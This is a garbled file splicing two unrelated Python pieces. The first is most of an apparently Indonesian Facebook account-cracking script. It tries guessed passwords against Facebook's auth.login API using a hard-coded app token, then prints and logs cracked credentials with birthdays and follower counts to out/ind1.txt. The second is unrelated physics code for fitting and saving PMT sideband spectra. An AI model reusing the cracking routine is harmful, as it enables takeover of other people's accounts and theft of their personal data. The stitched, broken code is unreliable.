print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;92m(!) [Berhasil]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass3
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
oks.append(user + pass3 + birthday + subscribers)
elif 'www.facebook.com' in w['error_msg']:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;93m(!) [Cekpoint]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass3
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
cek = open('out/ind1.txt', 'a')
cek.write('UID:' + user + ' Katasandi:' + pass3 + 'Tanggal Lahir:' + birthday + 'Followers:' + subscribers + '\n')
cek.close()
cekpoint.append(user + pass3 + birthday + subscribers)
else:
pass4 = '<PASSWORD>'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;92m(!) [Berhasil]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass4
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
oks.append(user + pass4 + birthday + subscribers)
elif 'www.facebook.com' in w['error_msg']:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;93m(!) [Cekpoint]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass4
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
cek = open('out/ind1.txt', 'a')
cek.write('UID:' + user + ' Katasandi:' + pass4 + 'Tanggal Lahir:' + birthday + 'Followers:' + subscribers + '\n')
cek.close()
cekpoint.append(user + pass4 + birthday + subscribers)
else:
pass5 = '<PASSWORD>'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;92m(!) [Berhasil]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass5
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
oks.append(user + pass5 + birthday + subscribers)
elif 'www.facebook.com' in w['error_msg']:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;93m(!) [Cekpoint]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass5
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
cek = open('out/ind1.txt', 'a')
cek.write('UID:' + user + ' Katasandi:' + pass5 + 'Tanggal Lahir:' + birthday + 'Followers:' + subscribers + '\n')
cek.close()
cekpoint.append(user + pass5 + birthday + subscribers)
else:
pass6 = c['first_name'] + '321'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;92m(!) [Berhasil]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass6
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
oks.append(user + pass6 + birthday + subscribers)
elif 'www.facebook.com' in w['error_msg']:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;93m(!) [Cekpoint]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass6
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
cek = open('out/ind1.txt', 'a')
cek.write('UID:' + user + ' Katasandi:' + pass6 + 'Tanggal Lahir:' + birthday + 'Followers:' + subscribers + '\n')
cek.close()
cekpoint.append(user + pass6 + birthday + subscribers)
else:
pass7 = '<PASSWORD>'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;92m(!) [Berhasil]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass7
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
oks.append(user + pass7 + birthday + subscribers)
elif 'www.facebook.com' in w['error_msg']:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;93m(!) [Cekpoint]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass7
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
cek = open('out/ind1.txt', 'a')
cek.write('UID:' + user + ' Katasandi:' + pass7 + 'Tanggal Lahir:' + birthday + 'Followers:' + subscribers + '\n')
cek.close()
cekpoint.append(user + pass7 + birthday + subscribers)
else:
pass8 = '<PASSWORD>'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;92m(!) [Berhasil]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass8
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
oks.append(user + pass8 + birthday + subscribers)
elif 'www.facebook.com' in w['error_msg']:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;93m(!) [Cekpoint]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass8
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
cek = open('out/ind1.txt', 'a')
cek.write('UID:' + user + ' Katasandi:' + pass8 + 'Tanggal Lahir:' + birthday + 'Followers:' + subscribers + '\n')
cek.close()
cekpoint.append(user + pass8 + birthday + subscribers)
else:
pass9 = '<PASSWORD>'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + <PASSWORD>9 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;92m(!) [Berhasil]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print | |
= None
for result in sorted(sb_fits.keys()):
try:
self.sb_results = np.vstack((self.sb_results, sb_fits[result]))
except:
self.sb_results = np.array(sb_fits[result])
self.sb_results = self.sb_results[:, [0, 1, 5, 2, 6, 3, 7, 4, 8]]
self.sb_results = self.sb_results[:, :7]
if verbose:
print("And the results, please:\n", self.sb_results)
self.full_dict = {}
for sb in self.sb_results:
self.full_dict[sb[0]] = np.asarray(sb[1:])
def laser_line(self, verbose=False):
"""
This method is designed to scale everything in the PMT to the conversion
efficiency based on our measurement of the laser line with a fixed
attenuation.
Creates:
self.parameters['normalized?'] = Flag to specify if the laser has been
accounted for.
:return: None
"""
if 0 not in self.sb_list:
self.parameters['normalized?'] = False
return
else:
laser_index = np.where(self.sb_results[:, 0] == 0)[0][0]
if verbose:
print("sb_results", self.sb_results[laser_index, :])
print("laser_index", laser_index)
laser_strength = np.array(self.sb_results[laser_index, 3:5])
if verbose:
print("Laser_strength", laser_strength)
for sb in self.sb_results:
sb[4] = (sb[3] / laser_strength[0]) * np.sqrt(
(sb[4] / sb[3]) ** 2 + (laser_strength[1] / laser_strength[0]) ** 2)
sb[3] = sb[3] / laser_strength[0]
for sb in list(self.full_dict.values()):
sb[3] = (sb[2] / laser_strength[0]) * np.sqrt(
(sb[3] / sb[2]) ** 2 + (laser_strength[1] / laser_strength[0]) ** 2)
sb[2] = sb[2] / laser_strength[0]
self.parameters['normalized?'] = True
def save_processing(self, file_name, folder_str, marker='', index=''):
"""
This will save all of the self.proc_data and the results from the
fitting of this individual file.
Format:
spectra_fname = file_name + '_' + marker + '_' + str(index) + '.txt'
fit_fname = file_name + '_' + marker + '_' + str(index) + '_fits.txt'
Inputs:
file_name = the beginning of the file name to be saved
folder_str = the location of the folder where the file will be saved,
will create the folder, if necessary.
marker = I...I don't know what this was originally for
index = used to keep these files from overwriting themselves when in a
list
Outputs:
Two files:
self.proc_data = the continuous spectrum
self.sb_results = the individual sideband details
:param file_name: The base name for the saved file
:type file_name: str
:param folder_str: The full name for the folder hte file is saved it. Folder can be created
:type folder_str: str
:param marker: Marker for the file, appended to file_name, often the self.parameters['series']
:type marker: str
:param index: used to keep these files from overwriting themselves when marker is the same
:type index: str or int
:return: None
"""
try:
os.mkdir(folder_str)
except OSError as e:
if e.errno == errno.EEXIST:
pass
else:
raise
spectra_fname = file_name + '_' + marker + '_' + str(index) + '.txt'
fit_fname = file_name + '_' + marker + '_' + str(index) + '_fits.txt'
self.save_name = spectra_fname
# self.parameters["files included"] = list(self.files)
try:
parameter_str = json.dumps(self.parameters, sort_keys=True, indent=4,
separators=(',', ': '))
except:
print("Source: PMT.save_images\nJSON FAILED")
print("Here is the dictionary that broke JSON:\n", self.parameters)
return
parameter_str = parameter_str.replace('\n', '\n#')
num_lines = parameter_str.count(
'#') # Make the number of lines constant so importing is easier
# for num in range(99 - num_lines): parameter_str += '\n#'
parameter_str += '\n#' * (99 - num_lines)
origin_import_spec = '\nNIR frequency,Signal,Standard error\neV,arb. u.,arb. u.\n,{:.3f},'.format(
self.parameters["fieldStrength"]["mean"])
spec_header = '#' + parameter_str + origin_import_spec
origin_import_fits = '\nCenter energy,error,Amplitude,error,Linewidth,error\neV,,arb. u.,,eV,,\n,,' # + marker
fits_header = '#' + parameter_str + origin_import_fits
for sideband in sorted(self.sb_dict.keys()):
try:
complete = np.vstack((complete, self.sb_dict[sideband]))
except:
complete = np.array(self.sb_dict[sideband])
np.savetxt(os.path.join(folder_str, spectra_fname), complete, delimiter=',',
header=spec_header, comments='', fmt='%0.6e')
try:
np.savetxt(os.path.join(folder_str, fit_fname), self.sb_results,
delimiter=',',
header=fits_header, comments='', fmt='%0.6e')
except AttributeError:
# Catch the error that happens if you save something without files
print("warning, couldn't save fit file (no sidebands found?)")
print("Saved PMT spectrum.\nDirectory: {}".format(
os.path.join(folder_str, spectra_fname)))
class TimeTrace(PMT):
"""
This class will be able to handle time traces output by the PMT softare.
"""
def __init__(self, file_path):
super(HighSidebandPMT, self).__init__(file_path)
class FullSpectrum(object):
def __init__(self):
pass
class FullAbsorbance(FullSpectrum):
"""
I'm imagining this will sew up absorption spectra, but I'm not at all sure
how to do that at the moment.
"""
def __init__(self):
pass
class FullHighSideband(FullSpectrum):
"""
I'm imagining this class is created with a base CCD file, then gobbles up
other spectra that belong with it, then grabs the PMT object to normalize
everything, assuming that PMT object exists.
"""
def __init__(self, initial_CCD_piece):
"""
Initialize a full HSG spectrum. Starts with a single CCD image, then
adds more on to itself using stitch_hsg_dicts.
Creates:
self.fname = file name of the initial_CCD_piece
self.sb_results = The sideband details from the initializing data
self.parameters = The parameter dictionary of the initializing data. May
not have all details of spectrum pieces added later.
self.full_dict = a copy of the sb_results without the zeroth column, which
is SB order
:param initial_CCD_piece: The starting part of the spectrum, often the lowest orders seen by CCD
